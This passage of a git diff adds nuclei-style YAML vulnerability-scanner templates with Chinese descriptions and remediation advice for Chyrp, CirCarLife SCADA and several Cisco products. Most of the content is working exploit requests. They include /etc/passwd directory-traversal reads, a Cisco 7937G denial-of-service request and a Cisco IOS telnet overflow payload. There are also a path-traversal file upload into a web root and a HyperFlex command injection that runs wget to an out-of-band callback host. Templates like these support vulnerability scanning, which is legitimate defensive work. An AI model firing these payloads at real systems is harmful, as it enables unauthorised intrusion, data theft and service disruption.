2.1及之前版本中存在目录遍历漏洞。借助action参数向index.php传递的输入在被用于包含文件之前没有经过正确验证,远程攻击者可借助目录遍历序列和URL编码的NULL字节包含并执行任意本地文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/vito/chyrp + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00' + method: GET diff --git a/config/51pwn/yaml/Chyrp/CVE-2011-2780.yaml b/config/51pwn/yaml/Chyrp/CVE-2011-2780.yaml new file mode 100755 index 000000000..4232676e6 --- /dev/null +++ b/config/51pwn/yaml/Chyrp/CVE-2011-2780.yaml @@ -0,0 +1,34 @@ +id: CVE-2011-2780 +info: + name: Chyrp 2.x - Local File Inclusion + author: + - l0ne1y + description: |- + Chyrp任意文件读取漏洞 + + Chyrp是一款开源的基于PHP和MySQL的轻量级博客(Blog)引擎。 + + Chyrp 2.0及之前版本的includes/lib/gz.php中存在目录遍历漏洞。远程攻击者可借助文件参数中的“..”操作符读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/vito/chyrp + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-11985.yaml b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-11985.yaml new file mode 100755 index 000000000..602c68a5b --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-11985.yaml @@ -0,0 +1,47 @@ +id: CNVD-2018-11985 +info: + name: circarlife scada info.html和log信息泄露 + author: + - jim2g + description: "circarlife scada info.html和log信息泄露\nCircontrol CirCarLife Scada是西班牙Circontrol公司的一套停车场自动化管理系统。\n\nCircontrol + CirCarLife Scada 4.2.4版本中存在安全漏洞。远程攻击者可通过对html/log或services/system/info.html URI发送直接请求利用该漏洞获取敏感信息。 " + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://circontrol.com/intelligent-charging-solutions/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body_1,"user.info") + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body_1,"user.debug") + - type: dsl + condition: or + dsl: + - status_code==200 + - contains(body_2,"CirCarLife") + raw: + - | + GET /html/log HTTP/1.1 + Host: {{Hostname}} + - | + GET /services/system/info.html HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19403.yaml b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19403.yaml new file mode 100755 index 000000000..fa447dabc --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19403.yaml @@ -0,0 +1,22 @@ +id: CNVD-2018-19403 +info: + name: circarlife scada 设备固件版本信息泄露 + author: + - jim2g + description: "circarlife scada 设备固件版本信息泄露\n \tCIRCONTROL CirCarLife是西班牙Circontrol公司的一套停车场自动化管理系统。\n\nCIRCONTROL + CirCarLife 4.3之前版本中存在信息泄露漏洞,该漏洞源于程序缺少对/html/device-id的身份验证。攻击者可利用该漏洞获取软件和硬件版本信息。" + severity: medium + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttps://circontrol.com/ \n临时修复方案:\n1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面\n2、将敏感信息进行加密存储,非必要不可发送前端\n3、发送敏感信息时需加密传输,如有必要需脱敏处理\n4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。\n5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口\n令、会话标识jsessionid等), + 防止敏感信息泄漏。\n6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓\n存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。\n7、对必须发送的敏感数据或页面请求接口做好严格的权限认证\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"circontrol") + raw: + - | + GET /html/device-id HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19569.yaml b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19569.yaml new file mode 100755 index 000000000..3295bed6c --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CNVD-2018-19569.yaml @@ -0,0 +1,37 @@ +id: CNVD-2018-19569 +info: + name: circarlife scada devstat.html信息泄露 + author: + - jim2g + description: |- + circarlife scada devstat.html信息泄露 + CIRCONTROL CirCarLife是西班牙Circontrol公司的一套停车场自动化管理系统。 + + CIRCONTROL CirCarLife 4.3之前版本中存在安全漏洞,该漏洞源于程序缺少对/html/devstat.html文件的身份验证。远程攻击者可利用该漏洞获取在充电站使用的PLC的状态信息。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"CCL1 devices status") + raw: + - | + GET /html/devstat.html HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CirCarLife Scada/CVE-2018-12634.yaml b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-12634.yaml new file mode 100755 index 000000000..9107e3aa2 --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-12634.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-12634 +info: + name: CirCarLife Scada <4.3 - System Log Exposure + author: + - l0ne1y + description: |- + CirCarLife Scada信息泄露漏洞 + Circontrol CirCarLife Scada是西班牙Circontrol公司的一套停车场自动化管理系统。 + + Circontrol CirCarLife Scada 4.2.4版本中存在安全漏洞。远程攻击者可通过对html/log或services/system/info.html URI发送直接请求利用该漏洞获取敏感信息。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://circontrol.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + part: header + words: + - CirCarLife Scada + - type: word + condition: and + words: + - user.debug + - user.info + - EVSE + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/html/log' + method: GET diff --git a/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16668.yaml b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16668.yaml new file mode 100755 index 000000000..8de8ef5b4 --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16668.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-16668 +info: + name: CirCarLife SCADA Installation Paths + author: + - l0ne1y + description: |- + CirCarLife Scada信息泄露漏洞 + CIRCONTROL CirCarLife是西班牙CIRCONTROL公司的一套停车场自动化管理系统。 + + CIRCONTROL CirCarLife 4.3之前版本中存在安全漏洞,该漏洞源于程序缺少对/html/repository文件的身份验证。攻击者可利用该漏洞泄露内部程序安装路径。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://circontrol.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + part: header + words: + - CirCarLife Scada + - type: word + condition: and + part: body + words: + - '** Platform sources **' + - '** Application sources **' + matchers-condition: and + path: + - '{{BaseURL}}/html/repository' + method: GET diff --git a/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16670.yaml b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16670.yaml new file mode 100755 index 000000000..0ba77452c --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16670.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-16670 +info: + name: CirCarLife SCADA PLC Status + author: + - l0ne1y + description: |- + CirCarlife Scada信息泄露漏洞 + CIRCONTROL CirCarLife是西班牙CIRCONTROL公司的一套停车场自动化管理系统。 + + CIRCONTROL CirCarLife 4.3之前版本中存在安全漏洞,该漏洞源程序于缺少对/html/devstat.html文件的身份验证。远程攻击者可利用该漏洞获取在充电站使用的PLC的状态信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://circontrol.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + part: header + words: + - CirCarLife Scada + - type: word + condition: and + part: body + words: + - + - Reader.STATUS + matchers-condition: and + path: + - '{{BaseURL}}/services/user/values.xml?var=STATUS' + method: GET diff --git a/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16671.yaml b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16671.yaml new file mode 100755 index 000000000..4d7777e3a --- /dev/null +++ b/config/51pwn/yaml/CirCarLife Scada/CVE-2018-16671.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-16671 +info: + name: CirCarLife SCADA Device ID + author: + - l0ne1y + description: |- + CirCarlife Scada信息泄露漏洞 + CIRCONTROL CirCarLife是西班牙CIRCONTROL公司的一套停车场自动化管理系统。 + + CIRCONTROL CirCarLife 4.3之前版本中存在信息泄露漏洞,该漏洞源于程序缺少对/html/device-id的身份验证。攻击者可利用该漏洞获取软件和硬件版本信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://circontrol.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + part: header + words: + - CirCarLife Scada + - type: word + part: body + words: + - circontrol + - type: regex + part: body + regex: + - (19|20)\d\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01]) + matchers-condition: and + path: + - '{{BaseURL}}/html/device-id' + method: GET diff --git a/config/51pwn/yaml/Cisco 7937G/CVE-2020-16139.yaml b/config/51pwn/yaml/Cisco 7937G/CVE-2020-16139.yaml new file mode 100755 index 000000000..1ad9c4187 --- /dev/null +++ b/config/51pwn/yaml/Cisco 7937G/CVE-2020-16139.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-16139 +info: + name: Cisco 7937G Denial-of-Service Reboot Attack + author: + - l0ne1y + description: |- + Cisco 7937G 输入验证错误漏洞 + Cisco 7937G是美国思科(Cisco)公司的一款在线会议终端设备。 + Cisco 7937G 1-4-4-0版本至1-4-5-7版本中存在安全漏洞。攻击者可利用该漏洞造成拒绝服务。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cisco.com/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/xml + - type: word + words: + - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + matchers-condition: and + raw: + - | + POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/Cisco DDR2200 ADSL2/CNVD-2017-25744.yaml b/config/51pwn/yaml/Cisco DDR2200 ADSL2/CNVD-2017-25744.yaml new file mode 100755 index 000000000..12e651759 --- /dev/null +++ b/config/51pwn/yaml/Cisco DDR2200 ADSL2/CNVD-2017-25744.yaml @@ -0,0 +1,27 @@ +id: CNVD-2017-25744 +info: + name: Cisco DDR2200 ADSL2+ Residential Gateway和DDR2201v1 ADSL2+ Residential Gateway目录遍历漏洞 + author: + - jim2g + description: | + Cisco DDR2200 ADSL2+ Residential Gateway和DDR2201v1 ADSL2+ Residential Gateway存在目录遍历漏洞 + Cisco DDR2200 ADSL2+ Residential Gateway和DDR2201v1 ADSL2+ Residential Gateway都是美国思科(Cisco)公司的家用无线网关设备。isco DDR2200 ADSL2+ Residential Gateway DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E版本和DDR2201v1 ADSL2+ Residential Gateway DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3版本中存在目录遍历漏洞。攻击者可通过向waitPingqry.cgi URL中发送带有shell元字符的‘pingAddr’参数利用该漏洞下载任意的系统文件。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.cisco.com/ \n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"/bin/sh") + - contains(body,"root") + raw: + - | + GET /download.conf?filename=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2017-3881.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2017-3881.yaml new file mode 100755 index 000000000..f2e4f5ac8 --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2017-3881.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-3881 +info: + name: Cisco IOS 12.2(55)SE11 - Remote Code Execution + author: + - l0ne1y + description: |- + Cisco IOS 代码执行漏洞 + Cisco Catalyst Switches等都是美国思科(Cisco)公司的交换机产品。Cisco IOS和IOS XE都是运行于其中的操作系统。 + + 多款Cisco产品中的IOS和IOS XE Software的Cluster Management Protocol (CMP)处理代码存在远程代码执行漏洞。远程攻击者可利用该漏洞造成受影响设备重载,或以提升的权限执行代码。以下设备受到影响:Cisco Catalyst switches;Embedded Service 2020 switches;Enhanced Layer 2 EtherSwitch Service Module;Enhanced Layer 2/3 EtherSwitch Service Module;Gigabit Ethernet Switch Module (CGESM) for HP;IE Industrial Ethernet switches;ME 4924-10GE switch;RF Gateway 10;SM-X Layer 2/3 EtherSwitch Service Module。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvd48893 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +network: +- matchers: + - type: word + words: + - Current privilege level is + host: + - '{{Hostname}}' + - '{{Host}}:23' + inputs: + - data: '{{hex_decode(''fffa240003'')}}CISCO_KITS{{hex_decode(''01'')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode(''000037b4023d55dc0000999c'')}}BBBB{{hex_decode(''00e1a9f4'')}}CCCCDDDDEEEE{{hex_decode(''00067b5c023d55c8'')}}FFFFGGGG{{hex_decode(''006cb3a000270b94'')}}HHHHIIII{{hex_decode(''014acf98'')}}JJJJKKKKLLLL{{hex_decode(''0114e7ec'')}}:15:{{hex_decode(''fff0'')}}' + read: 1024 + - data: show priv + read: 1024 + read-size: 1024 diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2018-0127.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2018-0127.yaml new file mode 100755 index 000000000..93292207f --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2018-0127.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-0127 +info: + name: Cisco RV132W/RV134W Router - Information Disclosure + author: + - l0ne1y + description: |- + Cisco Wireless VPN Routers信息泄露漏洞 + Cisco RV132W ADSL2+ Wireless-N VPN和RV134W VDSL2 Wireless-AC VPN Routers都是美国思科(Cisco)公司的路由器。Web interface是其中的一个Web界面。 + + Cisco RV132W ADSL2+ Wireless-N VPN和RV134W VDSL2 Wireless-AC VPN Routers中的Web界面存在信息泄露漏洞,该漏洞源于程序对某些界面缺少用户身份验证请求。远程攻击者可通过发送特制的请求并检查回复的HTTP响应利用该漏洞查看配置参数(包括:管理员密码)。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - Dump + - MDM + - cisco + - admin + matchers-condition: and + path: + - '{{BaseURL}}/dumpmdm.cmd' + method: GET diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2019-1653.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2019-1653.yaml new file mode 100755 index 000000000..ffd0f198c --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2019-1653.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-1653 +info: + name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure + author: + - l0ne1y + description: |- + Cisco Small Business RV320和RV325 访问控制错误漏洞 + Cisco Small Business RV320和RV325都是美国思科(Cisco)公司的企业级路由器。 + + 使用1.4.2.15版本至1.4.2.19版本固件的Cisco Small Business RV320和RV325中基于Web的管理界面存在信息泄露漏洞,该漏洞源于程序对URLs执行了错误的访问控制。远程攻击者可通过HTTP或HTTPS协议连接受影响的设备并请求URLs利用该漏洞检索敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - sysconfig + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/config.exp' + method: GET diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2019-1821.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2019-1821.yaml new file mode 100755 index 000000000..137fcdad4 --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2019-1821.yaml @@ -0,0 +1,48 @@ +id: CVE-2019-1821 +info: + name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager + - Remote Code Execution + author: + - l0ne1y + description: |- + Cisco Prime Infrastructure Software和Cisco Evolved Programmable Network Manager 输入验证错误漏洞 + Cisco Prime Infrastructure(PI)和Cisco Evolved Programmable Network(EPN)Manager的基于web的管理界面中存在一个漏洞,允许经过身份验证的远程攻击者以根级权限在底层操作系统上执行代码。存在此漏洞是因为软件未正确验证用户提供的输入。攻击者可以通过将恶意文件上载到管理web界面来利用此漏洞进行攻击。成功利用此漏洞可使攻击者以根级别权限在底层操作系统上执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code == 200 + - contains((body_2), '{{randstr}}') + raw: + - | + POST /servlet/UploadServlet HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Primary-IP: 127.0.0.1 + Filename: test.tar + Filesize: 10240 + Compressed-Archive: false + Destination-Dir: tftpRoot + Filecount: 1 + Content-Length: 269 + Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 + + --871a4a346a547cf05cb83f57b9ebcb83 + Content-Disposition: form-data; name="files"; filename="test.tar" + + ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} + --871a4a346a547cf05cb83f57b9ebcb83-- + - | + GET /test.txt HTTP/1.1 + Host: {{Host}} + req-condition: true diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2021-1497.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2021-1497.yaml new file mode 100755 index 000000000..02b2cf1e4 --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2021-1497.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-1497 +info: + name: Cisco HyperFlex HX Data Platform - Remote Command Execution + author: + - l0ne1y + description: |- + Cisco HyperFlex HX Data Platform 操作系统命令注入漏洞 + Cisco HyperFlex HX Data Platform是美国思科(Cisco)公司的一个网络设备。提供企业级的敏捷性,可扩展性,安全性和生命周期管理功能。 + + Cisco HyperFlex HX Data Platform 存在操作系统命令注入漏洞,该漏洞允许未经身份验证的远程攻击者执行对受影响的设备执行命令注入攻击。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - http + matchers-condition: and + raw: + - | + POST /auth/change HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + - | + POST /auth HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2021-1498.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2021-1498.yaml new file mode 100755 index 000000000..91343e971 --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2021-1498.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-1498 +info: + name: Cisco HyperFlex HX Data Platform - Remote Command Execution + author: + - l0ne1y + description: |- + Cisco HyperFlex HX Data Platform 操作系统命令注入漏洞 + Cisco HyperFlex HX Data Platform是美国思科(Cisco)公司的一个网络设备。提供企业级的敏捷性,可扩展性,安全性和生命周期管理功能。 + + Cisco HyperFlex HX Data Platform 存在操作系统命令注入漏洞,该漏洞允许未经身份验证的远程攻击者执行对受影响的设备执行命令注入攻击。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 